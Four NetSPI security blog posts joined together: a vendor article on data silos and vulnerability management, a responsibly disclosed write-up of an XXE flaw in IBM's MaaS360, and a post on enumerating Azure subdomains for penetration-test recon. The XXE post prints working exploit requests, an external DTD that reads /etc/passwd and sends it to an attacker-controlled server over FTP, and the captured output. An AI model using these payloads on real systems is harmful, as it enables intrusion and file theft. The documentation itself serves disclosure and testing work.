
Data Silos: Are They Really a Problem?

Data silos happen naturally for many reasons. As an organization grows and its security maturity evolves, it will likely end up with one or more of these scenarios.

Using multiple security testing scanners: As the security landscape evolves, so does the need for security testing tools, including SAST and DAST/IAST tools, network perimeter tools, internal or third-party penetration testing, and adversarial attack simulation. Companies that were once functioning with one SAST, DAST and network tool each will begin to add others to the toolkit, possibly along with additional pentesting companies and ticketing and/or GRC platforms.

Tracking remediation across multiple tools: One business unit’s development team could be on a single instance of JIRA, for example, while another business unit is using a separate instance, or even using a completely different ticketing system.

What Problems Do Data Silos Create in a Security Testing Environment?

Data silos can create several problems in a security testing environment. Two common challenges we see are duplicate vulnerabilities and false positives.

Let’s take a look at each one:

Duplicate vulnerabilities: This happens so easily. You’re using a SAST and a DAST tool for scanners. Your SAST and DAST tools both report an XSS vulnerability on the same asset, so your team receives multiple tickets for the same issue. Or, let’s say you run a perimeter scan and PCI penetration test on the same IP range as your vulnerability management team. Both report the same missing patch, and your organization receives duplicate tickets for remediation. If this only happened once, no big deal. But when scaled to multiple sites and thousands of identified vulnerabilities, duplicates create significant excess labor for already busy remediation teams. The result: contention across departments and slower remediation.

False positives: False positives create extra work, can cause teams to feel they’re chasing ghosts, and reduce confidence in security testing reports. Couple them with duplicate vulnerabilities, and the problems multiply. For example, say your security team reports a vulnerability from their SAST tool. The development team researches it and provides verification information as to why this vulnerability is a false positive. The security team marks it as a false positive, and everyone moves on. Then your security team runs their DAST tool. The same vulnerability is found and reported to the development team who then does the same research and provides the same information as to why this same vulnerability is still a false positive. Now you have extra work as well as the possibility of animosity between security and development teams.

Why Do These Problems Happen – and How Can You Stop Them?

The answer that many security scanner vendors offer is a walled garden, or closed platform. In other words, these security tools cannot ingest vulnerabilities from outside their solution suite. This approach may benefit the security solution vendor, but it hamstrings your security teams. Organizations reliant on these platforms are unable to select among best-of-breed security tools for specific purposes, or they risk losing a single, coherent view of their vulnerabilities enterprise-wide.

NetSPI recommends finding a vulnerability orchestration platform provider that can ensure choice while still delivering a single source of record for all vulnerabilities. Using a platform that can automatically aggregate, normalize, correlate and prioritize vulnerabilities allows organizations to retain the agility to test emerging technologies using commercially owned, open source, or even home-grown security tools. Not only will this minimize the challenges caused by data silos, but it can allow security teams to get more testing done, more quickly.
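Under the hood, the correlation step that makes this possible can be sketched as a simple grouping over normalized findings. This is only an illustration of the idea – the field names below are hypothetical, not NetSPI Resolve’s actual schema:

```python
from collections import defaultdict

# Hypothetical normalized findings: a SAST and a DAST tool both report
# the same XSS on one asset, plus one unrelated network finding.
findings = [
    {"source": "sast", "asset": "app.example.com", "weakness": "CWE-79"},
    {"source": "dast", "asset": "app.example.com", "weakness": "CWE-79"},
    {"source": "netscan", "asset": "10.0.0.5", "weakness": "CWE-306"},
]

def correlate(findings):
    """Collapse findings that share (asset, weakness) into one record,
    remembering every tool that reported the issue."""
    merged = defaultdict(set)
    for f in findings:
        merged[(f["asset"], f["weakness"])].add(f["source"])
    return dict(merged)

unique = correlate(findings)
print(len(unique))  # 3 raw findings collapse to 2 unique vulnerabilities
```

One ticket per key, annotated with every reporting source, is what prevents the duplicate-ticket problem described above.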

When we built NetSPI Resolve™, our own vulnerability orchestration platform, we built it to eliminate walled gardens. Development of the platform began almost twenty years ago, and it was the first commercially available security testing automation and vulnerability correlation software platform built to reduce the time required to identify and remediate vulnerabilities. As a technology-enabled service provider, we didn’t want to limit our testers to specific tools. NetSPI Resolve empowers our testers to choose the best tools and technology. More than that, because NetSPI Resolve can ingest and integrate data from multiple tools, it also provides our testers with comprehensive, automated reporting, ticketing, and SLA management. By reducing or eliminating the time spent on these kinds of tasks, NetSPI Resolve lets our testers do what they do best – test.

Data silos aren’t inevitable, but they are common. Knocking them down will go a long way toward reducing your organization’s cybersecurity risk by decreasing your overall time to remediate.



XXE in IBM's MaaS360 Platform

A couple of months ago I had the opportunity to test an implementation of MaaS360 – IBM’s MDM solution. The test was focused on device controls and the protection of corporate data, all things the client had configured and none of which will be discussed here. Instead, during the course of the test I stumbled upon an XML External Entity (XXE) vulnerability in one of the services used to deliver MaaS360 functionality to IBM clients. Details of the issue and its discovery are the focus of this blog.

XXE?

First, a lightning fast breakdown of eXtensible Markup Language (XML) and XXE:

XML is a flexible markup language capable of defining instructions for processing itself in a special section called the Document Type Definition (DTD). Within the DTD, ‘XML entities’ can be defined that tell the XML processor to replace certain pieces of text within the document with other values during parsing. As you’ll see below, if you can define a DTD as part of the XML payload that you provide to a service, you can potentially change the way the parser interprets the document.

XXE is a vulnerability in which an XML parser evaluates attacker-defined external XML entities. Traditional (non-external) XML entities are special sequences in an XML document that tell the parser the entire ‘entity’ should be replaced with some other text during document parsing. This can be used to allow characters that would otherwise be interpreted as XML meta-characters to be represented in the document, or to re-use common text in many places while only having to update a single location. Common XML entities supported by all parsers include ‘&gt;’ and ‘&lt;’ – during processing, these entities are replaced with the strings ‘>’ and ‘<’, respectively. To define a regular, non-external entity, you include the following in the DTD:

<!ENTITY regular_entity "I am replacement text">

Within the XML document, then, if you had the string:

<dataTag>This is an entity: &regular_entity;</dataTag>

That string during processing would be changed to:

<dataTag>This is an entity: I am replacement text</dataTag>
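The substitution above is easy to reproduce with a standard-library parser – a quick sketch using Python’s minidom, which expands entities defined in an inline DTD during parsing:

```python
from xml.dom.minidom import parseString

# The example document above, with its entity defined in an inline DTD.
xml_doc = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE dataTag [ <!ENTITY regular_entity "I am replacement text"> ]>'
    '<dataTag>This is an entity: &regular_entity;</dataTag>'
)

dom = parseString(xml_doc)
# The parser already replaced &regular_entity; while building the tree,
# so the text content contains the replacement text.
text = "".join(node.data for node in dom.documentElement.childNodes)
print(text)
```

That automatic, parser-level substitution is exactly the mechanic XXE abuses.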

External XML entities behave similarly, but their replacement values aren’t limited to text. With an external XML entity, you can provide a URL that defines an external resource that contains the text you want to be inserted. In this case, ‘external’ refers to the fact that the resource isn’t included within the document itself, and means the parser will have to access a separate resource in order to resolve the entity. To differentiate between a regular entity (whose replacement text is contained within the document) and an external entity (whose text is external to the document), the keywords ‘SYSTEM’ or ‘PUBLIC’ are included as part of the entity definition. To define an external entity in the DTD, you include the following:

<!ENTITY external_entity SYSTEM 'file:///etc/passwd'>

Within the XML document, any instance of the entity will be replaced. For example:

<dataTag>This is the password file: &external_entity;</dataTag>

will be transformed into:

<dataTag>This is the password file: root:x:0:0:root:/root:/bin/bash [...]</dataTag>

As you can see, if you can trick a parser into evaluating arbitrary external XML entities, you can gain access to the local filesystem.
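As a defensive aside (a sketch of one blunt mitigation, not how MaaS360 fixed the issue): if a service never expects DTDs from clients, the simplest option is to reject any untrusted document that carries one before it ever reaches the parser:

```python
import re
from xml.dom.minidom import parseString

def parse_untrusted(xml_text):
    """Refuse any document that ships its own DTD before it reaches the
    parser. Blunt, but it closes off inline-DTD and external-DTD tricks.
    (Parsers that support it should also disable DTD processing directly.)"""
    if re.search(r"<!DOCTYPE", xml_text, re.IGNORECASE):
        raise ValueError("DTDs are not allowed in untrusted XML")
    return parseString(xml_text)

parse_untrusted("<dataTag>safe</dataTag>")  # parses normally

try:
    parse_untrusted("<!DOCTYPE foo SYSTEM 'https://attacker.example/evil.dtd'><dataTag/>")
    blocked = False
except ValueError:
    blocked = True
print(blocked)
```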

The Issue

With the basics out of the way, let’s take a look at functionality in IBM’s MaaS360 that was vulnerable to this type of issue. API functionality wasn’t an area of focus during this test; however, there were a couple of places where configuration information was pulled down from MaaS360 servers – I decided to take a quick peek into these to see if I could trick the mobile client into configuring itself improperly. That led nowhere, but I did identify a handful of requests that were submitting XML payloads in POST requests.

Every request I looked at was being properly parsed and validated. Inline DTDs I added were being ignored and malformed XML documents were being properly rejected – every request with an XML payload seemed to be subject to the same validation standards. Oh well, it was a longshot.

And then, the last request I looked at had this:

POST /ios-mdm/ios-mdm-action.htm HTTP/1.1
Host: services.m3.maas360.com
Content-Type: application/x-www-form-urlencoded
Connection: close
Accept: */*
User-Agent: [REDACTED]
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Content-Length: 392

RP_REQUEST_TYPE=ACTIONS_RESPONSE_REQUEST&RP_CSN=[REDACTED]&RP_SEC_KEY=[REDACTED]&RP_DATA=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3CActionResults%3E%3CActionResult%20ID%3D%22%22%20type%3D%2213%22%3E%3Cparam%20name%3D%22status%22%3ESuccess%3C%2Fparam%3E%3C%2FActionResult%3E%3C%2FActionResults%3E%0A&RP_BILLING_ID=[REDACTED]&RP_PLATFORM_ID=[REDACTED]&RP_REQUEST_VERSION=[REDACTED]

Hmm. An XML payload, but URL-encoded and passed as the value of an x-www-form-urlencoded parameter. That’s interesting. They probably have to parse this differently than they parse their XML-only payloads. What if I…

POST /ios-mdm/ios-mdm-action.htm HTTP/1.1
Host: services.m3.maas360.com
Content-Type: application/x-www-form-urlencoded
Connection: close
Accept: */*
User-Agent: [REDACTED]
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Content-Length: 468

RP_REQUEST_TYPE=ACTIONS_RESPONSE_REQUEST&RP_CSN=[REDACTED]&RP_SEC_KEY=[REDACTED]&RP_DATA=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE+foo+SYSTEM+'https://6mtgnrnugo50ggqjccizibkrui09oy.netspi-collaborator.com'%3E%3CActionResults%3E%3CActionResult%20ID%3D%22%22%20type%3D%2213%22%3E%3Cparam%20name%3D%22status%22%3ESuccess%3C%2Fparam%3E%3C%2FActionResult%3E%3C%2FActionResults%3E%0A&RP_BILLING_ID=[REDACTED]

Note the above URL-encoded external entity that references https://6mtgnrnugo50ggqjccizibkrui09oy.netspi-collaborator.com – this is a Burp Collaborator URL. There was a delay, and then the application responded with a blank ‘HTTP 200’. Looking over at my Collaborator instance showed:


A DNS query, then an HTTP request to retrieve the resource I had injected! Not only did I have XXE, I also had unrestricted outbound access to help with exfiltration. The outbound access was key, in this case – as mentioned previously, the HTTP response to successful XXE processing was an ‘HTTP 200’ with an empty body, which is worthless for data exfiltration.

To take advantage of the unrestricted outbound access, I injected a DTD that referenced an additional DTD hosted on a server I controlled. This allowed me to define parameter entities that would be evaluated during the parsing of the XML document without requiring me to modify the existing (valid) document structure.

POST /ios-mdm/ios-mdm-action.htm HTTP/1.1
Host: services.m3.maas360.com
Content-Type: application/x-www-form-urlencoded
Connection: close
Accept: */*
User-Agent: MaaS360-MaaS360-iOS/3.50.83
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Content-Length: 452

RP_REQUEST_TYPE=ACTIONS_RESPONSE_REQUEST&RP_CSN=[REDACTED]&RP_SEC_KEY=[REDACTED]&RP_DATA=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE+foo+SYSTEM+'https://192.0.2.1/xxe.dtd'%3E%3CActionResults%3E%3CActionResult%20ID%3D%22%22%20type%3D%2213%22%3E%3Cparam%20name%3D%22status%22%3ESuccess%3C%2Fparam%3E%3C%2FActionResult%3E%3C%2FActionResults%3E%0A&RP_BILLING_ID=[REDACTED]&RP_PLATFORM_ID=3&RP_REQUEST_VERSION=1.0

In the request above, ‘https://192.0.2.1/xxe.dtd’ is a reference to the below DTD, hosted on a server I controlled:

<!ENTITY % all SYSTEM "file:///etc/passwd">
<!ENTITY % param1 "<!ENTITY % external SYSTEM 'ftp://192.0.2.1:443/%all;'>">
%param1;
%external;

To go through the parsing step-by-step:

1. POST request (with inline DTD referencing an external DTD) submitted to server
2. Server receives XML payload and starts parsing inline Document Type Definition (DTD)
3. Inline DTD references an external DTD, so the server retrieves the external DTD to continue parsing
4. Parsing the external DTD results in the creation of multiple parameter entities that contain our exfiltration payload and exfiltration endpoint
5. The final parsing of the (internal + external) DTD results in the FTP connection to the exfiltration server, which contains our exfiltrated data as part of the URL
6. As long as we have a ‘fake’ FTP service listening on our FTP server, we should be able to catch the exfiltrated data sent in step #5

The result of using the above to read the file ‘/etc/passwd’ is shown below:

root@pentest:~/# ruby server.rb
New client connected
USER anonymous
PASS Java1.8.0_161@
TYPE I
/root:x:0:0:root:
/root:
/bin
QUIT

You’ll notice that’s the first line of a typical /etc/passwd file, albeit split across multiple lines. Since I was clearly able to exfiltrate data, it was time to stop verifying the issue and notify IBM of the finding.
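The ‘fake’ FTP listener from step #6 can be sketched in a few lines of Python (hypothetical – the actual server.rb isn’t shown here). It accepts one connection, acknowledges every command so the Java FTP client keeps talking, and records each line it receives, including the exfiltrated data embedded in the URL path:

```python
import socket
import threading

def fake_ftp(server_sock, captured):
    """Accept one connection and log every FTP command line the client
    sends, replying '230 ok' to each so the client keeps talking."""
    conn, _ = server_sock.accept()
    conn.sendall(b"220 fake FTP ready\r\n")
    buf = b""
    while True:
        data = conn.recv(1024)
        if not data:
            return
        buf += data
        while b"\r\n" in buf:
            line, buf = buf.split(b"\r\n", 1)
            captured.append(line.decode())
            if line == b"QUIT":
                conn.sendall(b"221 bye\r\n")
                conn.close()
                return
            conn.sendall(b"230 ok\r\n")

server = socket.socket()
server.bind(("127.0.0.1", 0))  # ephemeral port; the real attack listened on 443
server.listen(1)
captured = []
t = threading.Thread(target=fake_ftp, args=(server, captured))
t.start()

# Stand-in for the vulnerable parser's outbound Java FTP client.
client = socket.create_connection(server.getsockname())
client.recv(1024)  # banner
for cmd in (b"USER anonymous", b"PASS Java1.8.0_161@", b"TYPE I", b"QUIT"):
    client.sendall(cmd + b"\r\n")
    client.recv(1024)
client.close()
t.join()
print(captured)
```

The key design point is the same as in the capture above: the listener never needs to speak real FTP, it just has to keep acknowledging commands so the client sends the ‘path’ containing the file contents.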

Conclusion

Some key takeaways from this:

1. XML is a dangerous data format that’s easy to handle incorrectly. If you see it, get excited.
2. If you’re looking into something and you feel like every parameter you test isn’t vulnerable, keep checking – it was the last request I checked that was vulnerable.

Disclosure Timeline

May 11, 2018: Vulnerability discovered, details sent to IBM
May 11, 2018: Response from IBM acknowledging report and containing advisory number for tracking
May 18, 2018: Email and response from IBM regarding status
June 8, 2018: Email regarding status. IBM response indicates issue confirmed and fix almost complete
June 22, 2018: Email regarding status. IBM response indicates issue was patched June 9, 2018
July 18-20, 2018: Email regarding blog release. IBM responds that blog is fine, indicates PSIRT acknowledgment page has been updated
October 2018: Blog published


Recurring Vulnerability Management Challenges That Can't Be Ignored

Stories of new data breaches grab headlines again and again. Many of these breaches are the result of known vulnerabilities left un-remediated, and in some cases, organizations have been aware of these vulnerabilities for years. Why weren’t these problems fixed sooner? Wouldn’t organizations try to fix them as soon as possible to avoid a breach?

Every organization strives to fix vulnerabilities rapidly. Unfortunately, fixing vulnerabilities is a complex task.

First, organizations are flooded with vulnerabilities. New vulnerabilities are reported daily and the volume is only increasing. Keeping pace is tough.

Second, there’s no single pane of glass for tracking all vulnerabilities. Organizations use multiple scanners to detect vulnerabilities, each living in its own walled garden. Application and network vulnerabilities are treated separately, typically in disconnected systems. Vulnerabilities discovered via pentesting may only reside in reports. Detective control tests find weaknesses in security tools, and auditing tools find vulnerabilities in configurations – and these results may not align with scan results. Unifying multiple sources in a central location, and normalizing the results for accurate tracking, is a big challenge.

Third, even if you have all vulnerabilities in a single pane, remediation processes vary and take time. Application vulnerabilities must go through the software development life cycle (SDLC), while network vulnerabilities have their own workflow. Identifying the right asset owner can be a challenge because CMDB information is often inaccurate. Configuration changes usually need to go through a change control board process, and patches need to be widely deployed across a large number of devices. There is little margin for error: fixing 99% of your vulnerabilities is great, but all it takes is that last 1% to cause a major breach.

On average, for every vulnerability patched, organizations lose 12 days coordinating across multiple teams. Contributing factors include:

  • Use of emails and spreadsheets to manage patching processes (57%)
  • No common view of systems and applications to be patched (73%)
  • No easy way to track if patching occurs in a timely manner (62%)

Fourth, many security organizations spend an inordinate amount of time focused on regulatory compliance. It’s critically important for your organization to build a strong, business-aligned security program that meets regulatory compliance standards. When a program is built to simply “check the box” of compliance, the results are inefficient, insecure, and not aligned with the business.

Finally, and most importantly, sheer human effort is not enough to overcome the vulnerability challenge because organizations don’t have enough talent or resources. A solid vulnerability management program requires talent focused on security, development, and operations – three skill sets that are in high demand. Cybersecurity is experiencing a negative unemployment rate; IT operations is fully occupied maintaining up-time; and developers are immersed in the agile SDLC.

We see common challenges in organizations of all sizes and across many industries. In the coming articles in this series, we’ll share our experiences and provide suggestions on how you can solve these challenges!


Anonymously Enumerating Azure Services

Microsoft makes use of a number of different domains/subdomains for each of their Azure services. We’ve previously covered some of these domains in a post about using trusted Azure domains for red team activities, but this time we’re going to focus on finding existing Azure subdomains as part of the recon process. Building off another previous post, where we talked about enumerating Azure storage accounts and public blob files, the script included in this post will do DNS brute forcing to find existing Azure service subdomains.

So why do we want to do this? Let’s say that we’re doing a pen test against a company (TEST_COMPANY). As part of the recon process, we would want to see if TEST_COMPANY uses any Azure services. If we can confirm a DNS host name for TEST_COMPANY.azurewebsites.net, there’s a pretty good chance that there’s a TEST_COMPANY website hosted on that Azure host. We can follow a similar process to find additional public facing services for the rest of the domains listed below.
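The recon check described above can be sketched as follows. This is Python for illustration only (the actual MicroBurst tooling is PowerShell), and the resolver is injectable so the logic can be exercised without live DNS – the stub resolver and TEST-NET address below are purely hypothetical:

```python
import socket

# A few of the Azure service domains covered in this post.
AZURE_DOMAINS = [
    "azurewebsites.net",
    "blob.core.windows.net",
    "database.windows.net",
]

def enumerate_subdomains(base, domains=AZURE_DOMAINS, resolve=socket.gethostbyname):
    """Return the candidate hostnames that resolve in DNS.
    An NXDOMAIN raises socket.gaierror, so those candidates are skipped."""
    found = []
    for domain in domains:
        host = f"{base}.{domain}"
        try:
            resolve(host)
            found.append(host)
        except socket.gaierror:
            pass
    return found

# Offline demo with a stubbed resolver standing in for real DNS:
def stub_resolve(host):
    if host == "test_company.azurewebsites.net":
        return "203.0.113.10"  # TEST-NET address, purely illustrative
    raise socket.gaierror(-2, "Name or service not known")

hits = enumerate_subdomains("test_company", resolve=stub_resolve)
print(hits)
```

With the default resolver, a hit for TEST_COMPANY.azurewebsites.net is the signal described above: a good chance a TEST_COMPANY site exists on that Azure host.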

Domains / Associated Services

Here’s a list of Azure-related domains that I’ve identified:

Domain                           Associated Service
azurewebsites.net                App Services
scm.azurewebsites.net            App Services – Management
p.azurewebsites.net              App Services
cloudapp.net                     App Services
file.core.windows.net            Storage Accounts – Files
blob.core.windows.net            Storage Accounts – Blobs
queue.core.windows.net           Storage Accounts – Queues
table.core.windows.net           Storage Accounts – Tables
redis.cache.windows.net          Databases – Redis
documents.azure.com              Databases – Cosmos DB
database.windows.net             Databases – MSSQL
vault.azure.net                  Key Vaults
onmicrosoft.com                  Microsoft Hosted Domain
mail.protection.outlook.com      Email
sharepoint.com                   SharePoint
azureedge.net                    CDN
search.windows.net               Search Appliance
azure-api.net                    API Services

Note: I tried to get all of the Azure subdomains into this script but there’s a chance that I missed a few. Feel free to add an issue to the repo to let me know if I missed any important ones.

The script for doing the subdomain enumeration relies on finding DNS records for permutations on a base word. In the example below, we used test12345678 as the base word and found a few matches. If you cut the base word to “test123”, you will find a significant number of matches (azuretest123, customertest123, dnstest123) with the permutations. While not every Azure service is going to contain the keywords of your client or application name, we do frequently run into services that share names with their owners.
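The permutation idea is simple enough to sketch in a few lines. The word list below is a tiny hypothetical stand-in for MicroBurst’s Misc/permutations.txt:

```python
# A tiny stand-in for MicroBurst's Misc/permutations.txt word list.
PERMUTATIONS = ["azure", "customer", "dns", "dev", "prod"]

def candidate_names(base, permutations=PERMUTATIONS):
    """Return the base word alone, plus each permutation applied as a
    prefix and as a suffix (deduplicated and sorted)."""
    names = {base}
    for p in permutations:
        names.add(p + base)
        names.add(base + p)
    return sorted(names)

names = candidate_names("test123")
print(names[:4])
```

Each candidate name is then checked against every Azure service domain from the table above, which is where the matches like azuretest123, customertest123, and dnstest123 come from.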

Github/Code Info

The script is part of the MicroBurst GitHub repo and it makes use of the same permutations file (Misc/permutations.txt) from the blob enumeration script.

Usage Example

The usage of this tool is pretty simple.

  • Download the code from GitHub – https://github.com/NetSPI/MicroBurst
  • Load up the module
    • Import-Module .\Invoke-EnumerateAzureSubDomains.ps1
    • or load the script file into the PowerShell ISE and hit F5

Example Command:

Invoke-EnumerateAzureSubDomains -Base test12345678 -Verbose


If you’re having issues with the PowerShell execution policy, I still have it on good authority that there are at least 15 different ways that you can bypass the policy.

Practical Use Cases

The following are a couple of practical use cases for dealing with some of the subdomains that you may find.

App Services – (azure-api.net, cloudapp.net, azurewebsites.net)
As we noted in the first section, the azurewebsites.net domains can indicate existing Azure hosted websites. While most of these will be standard/existing websites, you may get lucky and run into a dev site or a pre-production site that was not meant to be exposed to the internet. Here, you may find application security issues or sensitive information that is not supposed to be internet facing.

It is worth noting that the scm subdomains (test12345678.scm.azurewebsites.net) are for site management, and you should not be able to access those without proper authorization. I don’t think it’s possible to misconfigure the scm subdomains for public access, but you never know.

Storage Accounts – (file, blob, queue, table.core.windows.net)
Take a look at this previous post and use the same keywords that you find with the subdomain enumeration to see if the discovered storage accounts have public file listings.
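As a sketch of that check: a container whose access level is set to public ‘Container’ will answer an anonymous listing request with XML. The account/container names and the sample response below are hypothetical, trimmed down to the structure that matters:

```python
import xml.etree.ElementTree as ET

def container_list_url(account, container):
    """Anonymous blob-listing endpoint; returns XML only when the
    container's access level allows public 'Container' access."""
    return (f"https://{account}.blob.core.windows.net/"
            f"{container}?restype=container&comp=list")

def blob_names(listing_xml):
    """Pull the blob names out of an EnumerationResults response."""
    root = ET.fromstring(listing_xml)
    return [name.text for name in root.iter("Name")]

# A trimmed-down, hypothetical sample of a public container listing.
sample = """<EnumerationResults>
  <Blobs>
    <Blob><Name>backup.zip</Name></Blob>
    <Blob><Name>web.config</Name></Blob>
  </Blobs>
</EnumerationResults>"""

url = container_list_url("test12345678", "backups")
found = blob_names(sample)
print(url)
print(found)
```

A non-public container returns an error instead of the listing, so any response that parses into blob names is worth a closer look.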

Email/SharePoint/Hosted Domain – (onmicrosoft.com, mail.protection.outlook.com, sharepoint.com)
This one is pretty straightforward, but if a company is using Microsoft for email filtering, SharePoint, or if they have a domain that is registered with “onmicrosoft.com”, there’s a strong indication that they’ve at least started to get a presence in Azure/Office365.

Databases (database.windows.net, documents.azure.com, redis.cache.windows.net)
Although it’s unlikely, there is a chance that Azure database services are publicly exposed, and that there are default credentials on the databases that you find on Azure. Additionally, someone would need to be pretty friendly with their allowed inbound IPs to allow all IPs access to the database, but crazier things have happened.


Subdomain Takeovers
It may take a while to pay off, but enumerating existing Azure subdomains may be handy for anyone looking to do subdomain takeovers. Subdomain takeovers are usually done the other way around (finding a domain that’s no longer registered/in use), but by finding the domains now, and keeping tabs on them for later, you may be able to monitor for potential subdomain takeovers. While testing this script, I found that there are already a few people out there squatting on some existing subdomains (amazon.azurewebsites.net).

Wrap Up

Hopefully this is useful for recon activities for Azure pen testing. Since this active method is not perfect, make sure that you’re keeping an eye out for the domains listed above while you’re doing more passive recon activities. Feel free to let me know in the comments (or via a pull request) if you have any additional Azure/Microsoft domains that should be added to the list.

